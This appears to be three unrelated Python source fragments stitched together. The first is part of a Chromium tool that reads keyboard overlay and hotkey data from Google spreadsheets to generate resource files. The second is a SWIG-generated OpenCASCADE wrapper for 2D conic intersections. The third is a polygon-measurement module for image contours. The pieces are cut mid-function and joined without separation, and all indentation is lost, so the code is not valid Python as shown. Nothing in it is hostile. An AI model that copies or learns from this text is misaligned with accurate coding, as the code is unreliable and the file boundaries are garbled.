'xkb:gb:dvorak:eng': 'en_GB_dvorak',
'xkb:gb:extd:eng': 'en_GB',
'xkb:gr::gre': 'el',
'xkb:hr::scr': 'hr',
'xkb:hu::hun': 'hu',
'xkb:il::heb': 'iw',
'xkb:it::ita': 'it',
'xkb:jp::jpn': 'ja',
'xkb:latam::spa': 'es_419',
'xkb:lt::lit': 'lt',
'xkb:lv:apostrophe:lav': 'lv',
'xkb:no::nob': 'no',
'xkb:pl::pol': 'pl',
'xkb:pt::por': 'pt_PT',
'xkb:ro::rum': 'ro',
'xkb:rs::srp': 'sr',
'xkb:ru::rus': 'ru',
'xkb:ru:phonetic:rus': 'ru',
'xkb:se::swe': 'sv',
'xkb:si::slv': 'sl',
'xkb:sk::slo': 'sk',
'xkb:tr::tur': 'tr',
'xkb:ua::ukr': 'uk',
'xkb:us::eng': 'en_US',
'xkb:us::fil': 'en_US',
'xkb:us::ind': 'en_US',
'xkb:us::msa': 'en_US',
'xkb:us:altgr-intl:eng': 'en_US_altgr_intl',
'xkb:us:colemak:eng': 'en_US_colemak',
'xkb:us:dvorak:eng': 'en_US_dvorak',
'xkb:us:intl:eng': 'en_US_intl',
'xkb:us:intl:nld': 'en_US_intl',
'xkb:us:intl:por': 'en_US_intl',
'xkb:us:workman:eng': 'en_US_workman',
'xkb:us:workman-intl:eng': 'en_US_workman_intl',
}
# The file was first generated in 2012 and we have a policy of not updating
# copyright dates.
COPYRIGHT_HEADER=\
"""// Copyright (c) 2012 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
// This is a generated file but may contain local modifications. See
// src/tools/gen_keyboard_overlay_data/gen_keyboard_overlay_data.py --help
"""
# A snippet for grd file
GRD_SNIPPET_TEMPLATE=""" <message name="%s" desc="%s">
%s
</message>
"""
# A snippet for C++ file
CC_SNIPPET_TEMPLATE=""" { "%s", %s },
"""
def SplitBehavior(behavior):
"""Splits the behavior to compose a message or i18n-content value.
Examples:
'Activate last tab' => ['Activate', 'last', 'tab']
'Close tab' => ['Close', 'tab']
"""
return [x for x in re.split('[ ()"-.,]', behavior) if len(x) > 0]
def ToMessageName(behavior):
"""Composes a message name for grd file.
Examples:
'Activate last tab' => IDS_KEYBOARD_OVERLAY_ACTIVATE_LAST_TAB
'Close tab' => IDS_KEYBOARD_OVERLAY_CLOSE_TAB
"""
segments = [segment.upper() for segment in SplitBehavior(behavior)]
return 'IDS_KEYBOARD_OVERLAY_' + ('_'.join(segments))
def ToMessageDesc(description):
"""Composes a message description for grd file."""
message_desc = 'The text in the keyboard overlay to explain the shortcut'
if description:
message_desc = '%s (%s).' % (message_desc, description)
else:
message_desc += '.'
return message_desc
def Toi18nContent(behavior):
"""Composes a i18n-content value for HTML/JavaScript files.
Examples:
'Activate last tab' => keyboardOverlayActivateLastTab
'Close tab' => keyboardOverlayCloseTab
"""
segments = [segment.lower() for segment in SplitBehavior(behavior)]
result = 'keyboardOverlay'
for segment in segments:
result += segment[0].upper() + segment[1:]
return result
def ToKeys(hotkey):
"""Converts the action value to shortcut keys used from JavaScript.
Examples:
'Ctrl - 9' => '9<>CTRL'
'Ctrl - Shift - Tab' => 'tab<>CTRL<>SHIFT'
"""
values = hotkey.split(' - ')
modifiers = sorted(value.upper() for value in values
if value in ['Shift', 'Ctrl', 'Alt', 'Search'])
keycode = [value.lower() for value in values
if value not in ['Shift', 'Ctrl', 'Alt', 'Search']]
# The keys which are highlighted even without modifier keys.
base_keys = ['backspace', 'power']
if not modifiers and (keycode and keycode[0] not in base_keys):
return None
return '<>'.join(keycode + modifiers)
def ParseOptions():
"""Parses the input arguemnts and returns options."""
# default_username = os.getusername() + '@google.com';
default_username = '%s<EMAIL>' % os.environ.get('USER')
parser = optparse.OptionParser()
parser.add_option('--key', dest='key',
help='The key of the spreadsheet (required).')
parser.add_option('--username', dest='username',
default=default_username,
help='Your user name (default: %s).' % default_username)
parser.add_option('--password', dest='password',
help='Your password.')
parser.add_option('--account_type', default='GOOGLE', dest='account_type',
help='Account type used for gdata login (default: GOOGLE)')
parser.add_option('--js', dest='js', default=False, action='store_true',
help='Output js file.')
parser.add_option('--grd', dest='grd', default=False, action='store_true',
help='Output resource file.')
parser.add_option('--cc', dest='cc', default=False, action='store_true',
help='Output cc file.')
parser.add_option('--outdir', dest='outdir', default=None,
help='Specify the directory files are generated.')
(options, unused_args) = parser.parse_args()
if not options.username.endswith('google.com'):
print 'google.com account is necessary to use this script.'
sys.exit(-1)
if (not (options.js or options.grd or options.cc)):
print 'Either --js, --grd, or --cc needs to be specified.'
sys.exit(-1)
# Get the password from the terminal, if needed.
if not options.password:
options.password = <PASSWORD>(
'Application specific password for %s: ' % options.username)
return options
def InitClient(options):
"""Initializes the spreadsheet client."""
client = gdata.spreadsheet.service.SpreadsheetsService()
client.email = options.username
client.password = options.password
client.source = 'Spread Sheet'
client.account_type = options.account_type
print 'Logging in as %s (%s)' % (client.email, client.account_type)
client.ProgrammaticLogin()
return client
def PrintDiffs(message, lhs, rhs):
"""Prints the differences between |lhs| and |rhs|."""
dif = set(lhs).difference(rhs)
if dif:
print message, ', '.join(dif)
def FetchSpreadsheetFeeds(client, key, sheets, cols):
"""Fetch feeds from the spreadsheet.
Args:
client: A spreadsheet client to be used for fetching data.
key: A key string of the spreadsheet to be fetched.
sheets: A list of the sheet names to read data from.
cols: A list of columns to read data from.
"""
worksheets_feed = client.GetWorksheetsFeed(key)
print 'Fetching data from the worksheet: %s' % worksheets_feed.title.text
worksheets_data = {}
titles = []
for entry in worksheets_feed.entry:
worksheet_id = entry.id.text.split('/')[-1]
list_feed = client.GetListFeed(key, worksheet_id)
list_data = []
# Hack to deal with sheet names like 'sv (Copy of fl)'
title = list_feed.title.text.split('(')[0].strip()
titles.append(title)
if title not in sheets:
continue
print 'Reading data from the sheet: %s' % list_feed.title.text
for i, entry in enumerate(list_feed.entry):
line_data = {}
for k in entry.custom:
if (k not in cols) or (not entry.custom[k].text):
continue
line_data[k] = entry.custom[k].text
list_data.append(line_data)
worksheets_data[title] = list_data
PrintDiffs('Exist only on the spreadsheet: ', titles, sheets)
PrintDiffs('Specified but do not exist on the spreadsheet: ', sheets, titles)
return worksheets_data
def FetchKeyboardGlyphData(client):
"""Fetches the keyboard glyph data from the spreadsheet."""
glyph_cols = ['scancode', 'p0', 'p1', 'p2', 'p3', 'p4', 'p5', 'p6', 'p7',
'p8', 'p9', 'label', 'format', 'notes']
keyboard_glyph_data = FetchSpreadsheetFeeds(
client, KEYBOARD_GLYPH_SPREADSHEET_KEY,
INPUT_METHOD_ID_TO_OVERLAY_ID.values(), glyph_cols)
ret = {}
for lang in keyboard_glyph_data:
ret[lang] = {}
keys = {}
for line in keyboard_glyph_data[lang]:
scancode = line.get('scancode')
if (not scancode) and line.get('notes'):
ret[lang]['layoutName'] = line['notes']
continue
del line['scancode']
if 'notes' in line:
del line['notes']
if 'label' in line:
line['label'] = LABEL_MAP.get(line['label'], line['label'])
keys[scancode] = line
# Add a label to space key
if '39' not in keys:
keys['39'] = {'label': 'space'}
ret[lang]['keys'] = keys
return ret
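# Shape of the returned data (hypothetical values for illustration):
#   {'en_US': {'layoutName': 'US keyboard',
#              'keys': {'02': {'label': '1', 'p9': '!'},
#                       '39': {'label': 'space'}}},
#    ...}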
def FetchLayoutsData(client):
"""Fetches the keyboard glyph data from the spreadsheet."""
layout_names = ['U_layout', 'J_layout', 'E_layout', 'B_layout']
cols = ['scancode', 'x', 'y', 'w', 'h']
layouts = FetchSpreadsheetFeeds(client, KEYBOARD_GLYPH_SPREADSHEET_KEY,
layout_names, cols)
ret = {}
for layout_name, layout in layouts.items():
ret[layout_name[0]] = []
for row in layout:
line = []
for col in cols:
value = row.get(col)
if not value:
line.append('')
else:
if col != 'scancode':
value = float(value)
line.append(value)
ret[layout_name[0]].append(line)
return ret
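# Shape of the returned data (hypothetical values for illustration): keyed by
# the first letter of the layout name, each row is [scancode, x, y, w, h].
#   {'U': [['00', 0.0, 0.0, 10.0, 10.0], ...], 'J': [...], ...}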
def FetchHotkeyData(client):
"""Fetches the hotkey data from the spreadsheet."""
hotkey_sheet = ['Cross Platform Behaviors']
hotkey_cols = ['behavior', 'context', 'kind', 'actionctrlctrlcmdonmac',
'chromeos', 'descriptionfortranslation']
hotkey_data = FetchSpreadsheetFeeds(client, HOTKEY_SPREADSHEET_KEY,
hotkey_sheet, hotkey_cols)
action_to_id = {}
id_to_behavior = {}
# (behavior, action)
result = []
for line in hotkey_data['Cross Platform Behaviors']:
if (not line.get('chromeos')) or (line.get('kind') != 'Key'):
continue
action = ToKeys(line['actionctrlctrlcmdonmac'])
if not action:
continue
behavior = line['behavior'].strip()
description = line.get('descriptionfortranslation')
result.append((behavior, action, description))
return result
def UniqueBehaviors(hotkey_data):
"""Retrieves a sorted list of unique behaviors from |hotkey_data|."""
return sorted(set((behavior, description) for (behavior, _, description)
in hotkey_data),
cmp=lambda x, y: cmp(ToMessageName(x[0]), ToMessageName(y[0])))
def GetPath(path_from_src):
"""Returns | |
# This file was automatically generated by SWIG (http://www.swig.org).
# Version 3.0.1
#
# Do not make changes to this file unless you know what you are doing--modify
# the SWIG interface file instead.
from sys import version_info
if version_info >= (3,0,0):
new_instancemethod = lambda func, inst, cls: _IntAna2d.SWIG_PyInstanceMethod_New(func)
else:
from new import instancemethod as new_instancemethod
if version_info >= (2,6,0):
def swig_import_helper():
from os.path import dirname
import imp
fp = None
try:
fp, pathname, description = imp.find_module('_IntAna2d', [dirname(__file__)])
except ImportError:
import _IntAna2d
return _IntAna2d
if fp is not None:
try:
_mod = imp.load_module('_IntAna2d', fp, pathname, description)
finally:
fp.close()
return _mod
_IntAna2d = swig_import_helper()
del swig_import_helper
else:
import _IntAna2d
del version_info
try:
_swig_property = property
except NameError:
pass # Python < 2.2 doesn't have 'property'.
def _swig_setattr_nondynamic(self,class_type,name,value,static=1):
if (name == "thisown"): return self.this.own(value)
if (name == "this"):
if type(value).__name__ == 'SwigPyObject':
self.__dict__[name] = value
return
method = class_type.__swig_setmethods__.get(name,None)
if method: return method(self,value)
if (not static):
self.__dict__[name] = value
else:
raise AttributeError("You cannot add attributes to %s" % self)
def _swig_setattr(self,class_type,name,value):
return _swig_setattr_nondynamic(self,class_type,name,value,0)
def _swig_getattr(self,class_type,name):
if (name == "thisown"): return self.this.own()
method = class_type.__swig_getmethods__.get(name,None)
if method: return method(self)
raise AttributeError(name)
def _swig_repr(self):
try: strthis = "proxy of " + self.this.__repr__()
except: strthis = ""
return "<%s.%s; %s >" % (self.__class__.__module__, self.__class__.__name__, strthis,)
try:
_object = object
_newclass = 1
except AttributeError:
class _object : pass
_newclass = 0
def _swig_setattr_nondynamic_method(set):
def set_attr(self,name,value):
if (name == "thisown"): return self.this.own(value)
if hasattr(self,name) or (name == "this"):
set(self,name,value)
else:
raise AttributeError("You cannot add attributes to %s" % self)
return set_attr
class SwigPyIterator(object):
thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
def __init__(self, *args, **kwargs): raise AttributeError("No constructor defined - class is abstract")
__repr__ = _swig_repr
__swig_destroy__ = _IntAna2d.delete_SwigPyIterator
def __iter__(self): return self
SwigPyIterator.value = new_instancemethod(_IntAna2d.SwigPyIterator_value,None,SwigPyIterator)
SwigPyIterator.incr = new_instancemethod(_IntAna2d.SwigPyIterator_incr,None,SwigPyIterator)
SwigPyIterator.decr = new_instancemethod(_IntAna2d.SwigPyIterator_decr,None,SwigPyIterator)
SwigPyIterator.distance = new_instancemethod(_IntAna2d.SwigPyIterator_distance,None,SwigPyIterator)
SwigPyIterator.equal = new_instancemethod(_IntAna2d.SwigPyIterator_equal,None,SwigPyIterator)
SwigPyIterator.copy = new_instancemethod(_IntAna2d.SwigPyIterator_copy,None,SwigPyIterator)
SwigPyIterator.next = new_instancemethod(_IntAna2d.SwigPyIterator_next,None,SwigPyIterator)
SwigPyIterator.__next__ = new_instancemethod(_IntAna2d.SwigPyIterator___next__,None,SwigPyIterator)
SwigPyIterator.previous = new_instancemethod(_IntAna2d.SwigPyIterator_previous,None,SwigPyIterator)
SwigPyIterator.advance = new_instancemethod(_IntAna2d.SwigPyIterator_advance,None,SwigPyIterator)
SwigPyIterator.__eq__ = new_instancemethod(_IntAna2d.SwigPyIterator___eq__,None,SwigPyIterator)
SwigPyIterator.__ne__ = new_instancemethod(_IntAna2d.SwigPyIterator___ne__,None,SwigPyIterator)
SwigPyIterator.__iadd__ = new_instancemethod(_IntAna2d.SwigPyIterator___iadd__,None,SwigPyIterator)
SwigPyIterator.__isub__ = new_instancemethod(_IntAna2d.SwigPyIterator___isub__,None,SwigPyIterator)
SwigPyIterator.__add__ = new_instancemethod(_IntAna2d.SwigPyIterator___add__,None,SwigPyIterator)
SwigPyIterator.__sub__ = new_instancemethod(_IntAna2d.SwigPyIterator___sub__,None,SwigPyIterator)
SwigPyIterator_swigregister = _IntAna2d.SwigPyIterator_swigregister
SwigPyIterator_swigregister(SwigPyIterator)
import OCC.gp
import OCC.Standard
class IntAna2d_AnaIntersection(object):
thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
__repr__ = _swig_repr
def __init__(self, *args):
"""
* Empty constructor. IsDone returns False.
:rtype: None
* Intersection between two lines.
:param L1:
:type L1: gp_Lin2d
:param L2:
:type L2: gp_Lin2d
:rtype: None
* Intersection between two circles.
:param C1:
:type C1: gp_Circ2d
:param C2:
:type C2: gp_Circ2d
:rtype: None
* Intersection between a line and a circle.
:param L:
:type L: gp_Lin2d
:param C:
:type C: gp_Circ2d
:rtype: None
* Intersection between a line and a conic.
:param L:
:type L: gp_Lin2d
:param C:
:type C: IntAna2d_Conic &
:rtype: None
* Intersection between a circle and another conic.
:param C:
:type C: gp_Circ2d
:param Co:
:type Co: IntAna2d_Conic &
:rtype: None
* Intersection between an ellipse and another conic.
:param E:
:type E: gp_Elips2d
:param C:
:type C: IntAna2d_Conic &
:rtype: None
* Intersection between a parabola and another conic.
:param P:
:type P: gp_Parab2d
:param C:
:type C: IntAna2d_Conic &
:rtype: None
* Intersection between an hyperbola and another conic.
:param H:
:type H: gp_Hypr2d
:param C:
:type C: IntAna2d_Conic &
:rtype: None
"""
_IntAna2d.IntAna2d_AnaIntersection_swiginit(self,_IntAna2d.new_IntAna2d_AnaIntersection(*args))
def Perform(self, *args):
"""
* Intersection between two lines.
:param L1:
:type L1: gp_Lin2d
:param L2:
:type L2: gp_Lin2d
:rtype: None
* Intersection between two circles.
:param C1:
:type C1: gp_Circ2d
:param C2:
:type C2: gp_Circ2d
:rtype: None
* Intersection between a line and a circle.
:param L:
:type L: gp_Lin2d
:param C:
:type C: gp_Circ2d
:rtype: None
* Intersection between a line and a conic.
:param L:
:type L: gp_Lin2d
:param C:
:type C: IntAna2d_Conic &
:rtype: None
* Intersection between a circle and another conic.
:param C:
:type C: gp_Circ2d
:param Co:
:type Co: IntAna2d_Conic &
:rtype: None
* Intersection between an ellipse and another conic.
:param E:
:type E: gp_Elips2d
:param C:
:type C: IntAna2d_Conic &
:rtype: None
* Intersection between a parabola and another conic.
:param P:
:type P: gp_Parab2d
:param C:
:type C: IntAna2d_Conic &
:rtype: None
* Intersection between an hyperbola and another conic.
:param H:
:type H: gp_Hypr2d
:param C:
:type C: IntAna2d_Conic &
:rtype: None
"""
return _IntAna2d.IntAna2d_AnaIntersection_Perform(self, *args)
def IsDone(self, *args):
"""
        * Returns True if the computation was successful.
:rtype: bool
"""
return _IntAna2d.IntAna2d_AnaIntersection_IsDone(self, *args)
def IsEmpty(self, *args):
"""
        * Returns True when there is no intersection, i.e. no intersection point and the elements are not identical. The elements may be parallel in this case.
:rtype: bool
"""
return _IntAna2d.IntAna2d_AnaIntersection_IsEmpty(self, *args)
def IdenticalElements(self, *args):
"""
* For the intersection between an element of gp and a conic known by an implicit equation, the result will be True if the element of gp verifies the implicit equation. For the intersection between two Lin2d or two Circ2d, the result will be True if the elements are identical. The function returns False in all the other cases.
:rtype: bool
"""
return _IntAna2d.IntAna2d_AnaIntersection_IdenticalElements(self, *args)
def ParallelElements(self, *args):
"""
* For the intersection between two Lin2d or two Circ2d, the function returns True if the elements are parallel. The function returns False in all the other cases.
:rtype: bool
"""
return _IntAna2d.IntAna2d_AnaIntersection_ParallelElements(self, *args)
def NbPoints(self, *args):
"""
* returns the number of IntPoint between the 2 curves.
:rtype: int
"""
return _IntAna2d.IntAna2d_AnaIntersection_NbPoints(self, *args)
def Point(self, *args):
"""
* returns the intersection point of range N; If (N<=0) or (N>NbPoints), an exception is raised.
:param N:
:type N: int
:rtype: IntAna2d_IntPoint
"""
return _IntAna2d.IntAna2d_AnaIntersection_Point(self, *args)
def __del__(self):
try:
self.thisown = False
GarbageCollector.garbage.collect_object(self)
except:
pass
IntAna2d_AnaIntersection.Perform = new_instancemethod(_IntAna2d.IntAna2d_AnaIntersection_Perform,None,IntAna2d_AnaIntersection)
IntAna2d_AnaIntersection.IsDone = new_instancemethod(_IntAna2d.IntAna2d_AnaIntersection_IsDone,None,IntAna2d_AnaIntersection)
IntAna2d_AnaIntersection.IsEmpty = new_instancemethod(_IntAna2d.IntAna2d_AnaIntersection_IsEmpty,None,IntAna2d_AnaIntersection)
IntAna2d_AnaIntersection.IdenticalElements = new_instancemethod(_IntAna2d.IntAna2d_AnaIntersection_IdenticalElements,None,IntAna2d_AnaIntersection)
IntAna2d_AnaIntersection.ParallelElements = new_instancemethod(_IntAna2d.IntAna2d_AnaIntersection_ParallelElements,None,IntAna2d_AnaIntersection)
IntAna2d_AnaIntersection.NbPoints = new_instancemethod(_IntAna2d.IntAna2d_AnaIntersection_NbPoints,None,IntAna2d_AnaIntersection)
IntAna2d_AnaIntersection.Point = new_instancemethod(_IntAna2d.IntAna2d_AnaIntersection_Point,None,IntAna2d_AnaIntersection)
IntAna2d_AnaIntersection._kill_pointed = new_instancemethod(_IntAna2d.IntAna2d_AnaIntersection__kill_pointed,None,IntAna2d_AnaIntersection)
IntAna2d_AnaIntersection_swigregister = _IntAna2d.IntAna2d_AnaIntersection_swigregister
IntAna2d_AnaIntersection_swigregister(IntAna2d_AnaIntersection)
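# Hypothetical usage sketch (assumes the gp_Pnt2d/gp_Dir2d/gp_Lin2d wrappers
# from the OCC.gp module imported above): intersect two 2d lines and inspect
# the result.
#
#   l1 = OCC.gp.gp_Lin2d(OCC.gp.gp_Pnt2d(0., 0.), OCC.gp.gp_Dir2d(1., 0.))
#   l2 = OCC.gp.gp_Lin2d(OCC.gp.gp_Pnt2d(1., -1.), OCC.gp.gp_Dir2d(0., 1.))
#   inter = IntAna2d_AnaIntersection(l1, l2)
#   if inter.IsDone() and not inter.IsEmpty():
#       for i in range(1, inter.NbPoints() + 1):
#           pt = inter.Point(i)  # an IntAna2d_IntPoint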
class IntAna2d_Conic(object):
thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
__repr__ = _swig_repr
def __init__(self, *args):
"""
:param C:
:type C: gp_Circ2d
:rtype: None
:param C:
:type C: gp_Lin2d
:rtype: None
:param C:
:type C: gp_Parab2d
:rtype: None
:param C:
:type C: gp_Hypr2d
:rtype: None
:param C:
:type C: gp_Elips2d
:rtype: None
"""
_IntAna2d.IntAna2d_Conic_swiginit(self,_IntAna2d.new_IntAna2d_Conic(*args))
def Value(self, *args):
"""
* value of the function F at the point X,Y.
:param X:
:type X: float
:param Y:
:type Y: float
:rtype: float
"""
return _IntAna2d.IntAna2d_Conic_Value(self, *args)
def Grad(self, *args):
"""
* returns the value of the gradient of F at the point X,Y.
:param X:
:type X: float
:param Y:
:type Y: float
:rtype: gp_XY
"""
return _IntAna2d.IntAna2d_Conic_Grad(self, *args)
def ValAndGrad(self, *args):
"""
* Returns the value of the function and its gradient at the point X,Y.
:param X:
:type X: float
:param Y:
:type Y: float
:param Val:
:type Val: float &
:param Grd:
:type Grd: gp_XY
:rtype: None
"""
return _IntAna2d.IntAna2d_Conic_ValAndGrad(self, *args)
def Coefficients(self, *args):
"""
        * returns the coefficients of the polynomial equation which defines the conic: A.X**2 + B.Y**2 + 2.C.X*Y + 2.D.X + 2.E.Y + F = 0.
:param A:
:type A: float &
:param B:
:type B: float &
:param C:
:type C: float &
:param D:
:type D: float &
:param E:
:type E: float &
:param F:
:type F: float &
:rtype: None
"""
return _IntAna2d.IntAna2d_Conic_Coefficients(self, *args)
def NewCoefficients(self, *args):
"""
        * Returns the coefficients of the polynomial equation (written in the natural coordinate system) A*x*x + B*y*y + 2*C*x*y + 2*D*x + 2*E*y + F in the local coordinate system defined by Axis.
:param A:
:type A: float &
:param B:
:type B: float &
:param C:
:type C: float &
:param D:
:type D: float &
:param E:
:type E: float &
:param F:
:type F: float &
:param Axis:
:type Axis: gp_Ax2d
:rtype: None
"""
return _IntAna2d.IntAna2d_Conic_NewCoefficients(self, *args)
def __del__(self):
try:
self.thisown = False
GarbageCollector.garbage.collect_object(self)
except:
pass
IntAna2d_Conic.Value = new_instancemethod(_IntAna2d.IntAna2d_Conic_Value,None,IntAna2d_Conic)
IntAna2d_Conic.Grad = new_instancemethod(_IntAna2d.IntAna2d_Conic_Grad,None,IntAna2d_Conic)
IntAna2d_Conic.ValAndGrad = new_instancemethod(_IntAna2d.IntAna2d_Conic_ValAndGrad,None,IntAna2d_Conic)
IntAna2d_Conic.Coefficients = new_instancemethod(_IntAna2d.IntAna2d_Conic_Coefficients,None,IntAna2d_Conic)
IntAna2d_Conic.NewCoefficients = new_instancemethod(_IntAna2d.IntAna2d_Conic_NewCoefficients,None,IntAna2d_Conic)
IntAna2d_Conic._kill_pointed = new_instancemethod(_IntAna2d.IntAna2d_Conic__kill_pointed,None,IntAna2d_Conic)
IntAna2d_Conic_swigregister = _IntAna2d.IntAna2d_Conic_swigregister
IntAna2d_Conic_swigregister(IntAna2d_Conic)
class IntAna2d_IntPoint(object):
thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
__repr__ = _swig_repr
    def __init__(self, *args):
# polytools.py
# ALS 2016/04/29
"""
Contain functions for shape measurements on polygons.
Does not support astropy unit
References:
https://en.wikipedia.org/wiki/Shape_factor_(image_analysis_and_microscopy)
https://en.wikipedia.org/wiki/Feret_diameter
PEER REVIEW Particle Shape Factors and Their Use in Image Analysis Part 1: Theory by <NAME>
Notation
--------
polys: list of poly
poly: (N*2) ndarray of double
list of corner coordinates (r,c)=(y,x) of the polygon.
Next development steps:
1. build FeretD_max.
"""
import numpy as np
import skimage.measure as skmeasure
import collections
import astropy.table as at
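# Notation demo (hypothetical values): a unit square as a poly in
# (r, c) = (y, x) coordinates, ordered so that its signed area is positive:
#
#   square = np.array([[0., 0.], [1., 0.], [1., 1.], [0., 1.]])
#   SignedPolygonArea(square)  # -> 1.5 (area 1.0 plus the +0.5 corner correction)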
def ShapeParamsTab_from_contours(contours, xc, yc):
"""
    Return a table of measurements from the input contours (everything in pixel units), e.g.:
area_pix dmax_pix rmax_pix dper_pix theta_dmax theta_rmax theta_dper aspectr
-------- ------------- ------------- ------------- ------------- ------------- -------------- -------
8.0 3.60555127546 1.80277563773 3.60555127546 33.6900668147 146.309932696 -56.3099331853 1.0
"""
cols = ['area_pix', 'dmax_pix', 'rmax_pix', 'dper_pix', 'theta_dmax', 'theta_rmax', 'theta_dper', 'aspectr']
tab = at.Table(names=cols)
if len(contours)>0:
area = NetPolygonsArea(contours)
dferetmax, theta_dferetmax = FeretD_max(contours)
rferetmax, theta_rferetmax = FeretR_max(contours, xc, yc)
dferetper, theta_dferetper = FeretD_max90(contours)
aspectr = FeretAspectRatio(contours)
row = [area, dferetmax, rferetmax, dferetper, theta_dferetmax, theta_rferetmax, theta_dferetper, aspectr]
else:
row = [0., 0., 0., 0., np.nan, np.nan, np.nan, np.nan]
tab.add_row(row)
return tab
def find_centercontours(img, threshold, xc, yc, radius=3):
contours = find_contours(img, threshold)
return select_center_contours(contours, xc, yc, radius=radius)
def find_largecontours(img, threshold, minarea):
""" Find all isophote patch larger than certain area. See select_large_contours for details. """
contours = find_contours(img, threshold)
return select_large_contours(contours, minarea)
def find_contours(img, threshold, tocomplete=True):
"""
Return all isophote contours. Each contours is (N*2) ndarray of double.
High contours are counter-clockwise points and low contours are clockwise
points.
if tocomplete is True, even contours at edges are always closed.
"""
# negative edge padding to close all contours
if tocomplete: # to complete contours
wpad=2
img_pad = np.pad(img, [[wpad, wpad], [wpad, wpad]], mode='constant', constant_values=-1.e300)
contours = skmeasure.find_contours(img_pad, threshold, fully_connected='low', positive_orientation='high')
contours = [contour-wpad for contour in contours]
else:
contours = skmeasure.find_contours(img, threshold, fully_connected='low', positive_orientation='high')
return contours
def select_large_contours(contours, minarea):
"""
    Find all patches that have areas above minarea. A patch is a high contour plus all of the low contours (holes) it encloses; the hole areas are subtracted from the patch area.
"""
large_highcontours = select_large_highcontours(contours, minarea)
results = []
for highcontour in large_highcontours:
patch = get_patches_of_highcontours(contours, [highcontour])
if NetPolygonsArea(patch) >= minarea:
results = results+patch
return unique_polys(results)
def select_large_highcontours(contours, minarea):
"""
    Find all high contours that have areas above minarea (in pixels). Holes within the high contours are ignored.
"""
results = []
for contour in contours:
if SignedPolygonArea(contour) >= minarea:
results = results+[contour]
return unique_polys(results)
def select_center_contours(contours, xc, yc, radius=3):
highcontours = select_center_highcontours(contours, xc, yc, radius=radius)
allcontours = get_patches_of_highcontours(contours, highcontours)
return allcontours
def select_center_highcontours(contours, xc, yc, radius=3):
"""
    Select all the high contours in `contours` that overlap with the center
    region around (xc, yc). Contours larger than the circle of the given
    radius must enclose the center point; smaller contours only need to pass
    within `radius` of it.
"""
# setting
carea = np.pi * radius**2
ptc = np.array([xc, yc])
highcontours = select_highcontours(contours)
ccontours = []
for contour in highcontours:
if SignedPolygonArea(contour) >= carea:
if skmeasure.points_in_poly(np.array([ptc]), contour)[0]:
ccontours = ccontours+[contour]
else:
if contour_is_close_to_point(contour, ptc, distance=radius):
ccontours = ccontours+[contour]
return ccontours
def contour_is_close_to_point(contour, pt, distance=1.):
dissq = ((pt[0]-contour[:, 0])**2 + (pt[1]-contour[:, 1])**2)
result = np.any(dissq <= distance**2)
return result
def select_highcontours(contours):
"""
select high contours within contours
"""
highcontours = []
for contour in contours:
if SignedPolygonArea(contour) > 0.:
highcontours = highcontours+[contour]
return highcontours
def select_lowcontours(contours):
"""
select low contours within contours
"""
lowcontours = []
for contour in contours:
if SignedPolygonArea(contour) < 0.:
lowcontours = lowcontours+[contour]
return lowcontours
def select_enclosedcontours(contours, outcontours):
"""
Among 'contours', select the ones that are enclosed by 'outcontours'. The contours that are identical to any of the outcontours are not included.
"""
contours = to_polys(contours)
outcontours = to_polys(outcontours)
incontours = []
for contour in contours:
isinsides = np.array([isinside_polygon(contour, outcontour) for outcontour in outcontours])
isequals = np.array([isequal_polygon(contour, outcontour) for outcontour in outcontours])
if any(isinsides) and all(~isequals):
incontours = incontours+[contour]
return incontours
def to_polys(poly):
if ispolys(poly):
return poly
else:
if ispolys([poly]):
return [poly]
else:
raise ValueError("input not polys or poly")
def get_patches_of_highcontours(contours, highcontours):
""" find all the low contours enclosed in the highcontours, return highcontours + enclosed low contours """
if not ispolys(highcontours):
raise ValueError("[polytools] highcontours is not polys")
if not ispolys(contours):
raise ValueError("[polytools] contours is not polys")
lowcontours = select_lowcontours(contours)
lowcontours = select_enclosedcontours(lowcontours, highcontours)
allcontours = highcontours+lowcontours
allcontours = unique_polys(allcontours)
return allcontours
def unique_polys(polys):
"""
Return unique polys
"""
uniqpolys = []
for poly in polys:
if not any([isequal_polygon(p, poly) for p in uniqpolys]):
uniqpolys.append(poly)
return uniqpolys
def ispolys(polys):
"""
tell if 'polys' is a list of polygons, which are np arrays of (x,y) points.
"""
if isinstance(polys, (list, np.ndarray)):
if np.all([ispoly(poly) for poly in polys]):
return True
else:
return False
else:
return False
def ispoly(poly):
"""
return True if poly is a np array of shape (N,2)
"""
if isinstance(poly, np.ndarray):
if len(poly.shape) == 2 and poly.shape[-1] == 2:
return True
else:
return False
else:
return False
def isequal_polygon(poly1, poly2):
""" tell if these two polygons are equal """
return np.array_equal(poly1, poly2)
def isinside_polygon(poly1, poly2):
""" tell if poly1 is enclosed by poly2, i.e. all the points are inside.
Identical polys are not inside each other """
return np.all(skmeasure.points_in_poly(poly1, poly2))
def NetPolygonsArea(polys):
"""
    Calculate the net area of a group of polygons. Counter-clockwise
    polygons have positive areas while clockwise ones have negative.
Parameters
----------
polys : list of polygons, each is a (N*2) array of corner coordinates
list of polygons to use
Returns
-------
area : float
"""
area = 0.0
for i in range(len(polys)):
area += SignedPolygonArea(polys[i])
return area
def SignedPolygonArea(poly):
"""
    Calculate the signed area inside a polygon using the Shoelace formula.
    Positive for clockwise (on the x-y plane) polygons.
    A +/-0.5 corner correction is applied to account for the four corners of
    the box that can be dropped because of the interpolation. After the
    correction, the area is exact for the contours of a binary image with the
    threshold set to 0.5. See test_polytools.py.
Parameters
----------
poly : (N*2) ndarray of double
list of corner coordinates (r,c) = (y,x) of the polygon
N is the number of corners.
Returns
-------
area : float
Reference
-------
https://en.wikipedia.org/wiki/Shoelace_formula
http://stackoverflow.com/questions/24467972/calculate-area-of-polygon-given-x-y-coordinates
"""
    n = len(poly)  # number of corners of the polygon
area = 0.0
for i in range(n):
j = (i + 1) % n
area += poly[i][0] * poly[j][1]
area -= poly[j][0] * poly[i][1]
area = area / 2.0
if np.isfinite(area):
if area > 0:
cornercorrection = 0.5
elif area == 0:
cornercorrection = 0.
elif area < 0:
cornercorrection = -0.5
return area + cornercorrection
else:
print("[polytools] WARNING nan area encountered")
return 0.
def FeretDiameter(sth,theta):
"""
